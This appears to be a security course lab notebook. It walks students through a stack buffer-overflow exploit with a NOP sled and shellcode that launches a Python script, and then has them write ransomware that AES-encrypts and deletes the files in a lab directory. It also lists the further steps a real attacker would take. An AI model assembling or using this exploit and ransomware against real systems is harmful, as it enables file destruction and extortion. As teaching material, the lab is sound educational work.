# Malware

In this notebook, we're going to use our exploit to perform a malware attack. You will write the malware yourself (with some guidance). The main idea here is that you start to imagine what an adversary can accomplish after hijacking control flow.

First, we need to hijack control flow. The Python code in "payload.py" includes some new shellcode. Otherwise, it looks exactly like "exploitmenop.py".

In [ ]:
#!/usr/bin/python
  
from struct import pack

new_ra=pack("<I",0xaabbccdd) # FIX ME
overflow=b"A"*10             # FIX ME

shellcode=b'\x31\xc0\x50\x68\x65\x2e\x70\x79\x68\x6c\x77\x61\x72\x68\x2e\x2f\x6d\x61\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'

nopsled="\x90"*128

payload=overflow+new_ra+nopsled+shellcode

print(payload)

To get this exploit working, you'll once again need to point new_ra to the correct address and make sure to overflow with the correct number of characters. There's no need to recompute those values. You should be able to just copy your answers from "exploitmenop.py". If this exploit works, you should be able to run these commands:

./payload.py > input.txt  
./exploitme < input.txt

If everything is working, you should see the following output:

MALWARE EXECUTED

## Writing Malware

Where did that message come from? Look in the file "malware.py". In addition to some extra stuff, you should see the following code at the bottom:

In [ ]:
def main():
    print("MALWARE EXECUTED")

main()

The shellcode in "payload.py" runs this script! If you'd like to prove that to yourself, you could change the message "malware.py" prints and rerun your exploit to see the new output.

You're going to write some malware in this Python file. Specifically, you're going to write a ransomware attack (well, most of an attack.) The directory "ransomme" has some text files in it. You will encrypt all of those files and then delete the originals (be careful about what you delete!)

I've already gotten you started with a few functions. fileList is a function that takes a path to a directory. It returns a list of files. Here's a demonstration of what it can do:

In [ ]:
import os
def fileList(directory):
    rv=[]
    for fname in os.listdir(directory):
        rv.append(os.path.join(directory,fname))
    return rv

for file in fileList("./ransomme"):
    print(file)

As you can see, you can use "fileList" to get the names of all of the files in ransomme.

The function encryptFile takes a key (a 16 letter string) and the name of a file and creates an encrypted version of the file.

In [ ]:
import os, random, struct
from Crypto.Cipher import AES

def encryptFile(key,filename):
    chunksize=64*1024
    outfilename=filename+".enc"
    iv=os.urandom(16)
    encryptor=AES.new(key, AES.MODE_CBC, iv)
    filesize=os.path.getsize(filename)

    with open(filename, 'rb') as infile:
        with open(outfilename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - len(chunk) % 16)
                outfile.write(encryptor.encrypt(chunk))
                
encryptFile("ABCDEFGHIJKLMNOP","exploitme.c")

If you look in your Assignment10 directory, you should see a file named "exploitme.c.enc" that contains the encrypted version of this file.

Finally, we have "deleteFile". **BE CAREFUL** with this function. It deletes a file. Once you run it, I can't help you get the file back. I'll use it here to get rid of the encrypted file "exploitme.c.enc" that we just created.

In [ ]:
def deleteFile(fname):
    os.remove(fname)
    
deleteFile("exploitme.c.enc")

If you check your Assignment10 directory now, you should see that exploitme.c.enc is gone.

## Exercises

Wait... exercises already? Yes! Your *one and only exercise* is to write the ransomware. I'll be available to answer your questions, but this is your show. You should rewrite "main" in "malware.py" so it loops through all the files in ransomme, encrypts them, and then deletes the originals. You should make your own key string, so only you can decrypt the files.

This is it! Your chance to be truly evil! Good luck!

**TIP:** You can create a test copy of the "ransomme" directory with this command:

cp -r ransomme testcopy

You can develop and test your exploit by targeting the "testcopy" directory first. Once it's working, then you can target "ransomme".

**NOTE:** This isn't the entire ransomware attack. A real adversary would need to take a few more steps. They'd need to:

1) Securely transmit the key to themselves over the internet, so they'd know how to decrypt the files.

2) Delete the "malware.py" script, to prevent the victim from retrieving the encryption key.

3) Notify the victim that their files were encrypted and how to make a payment.

4) Set up a cryptocurrency wallet to receive payment.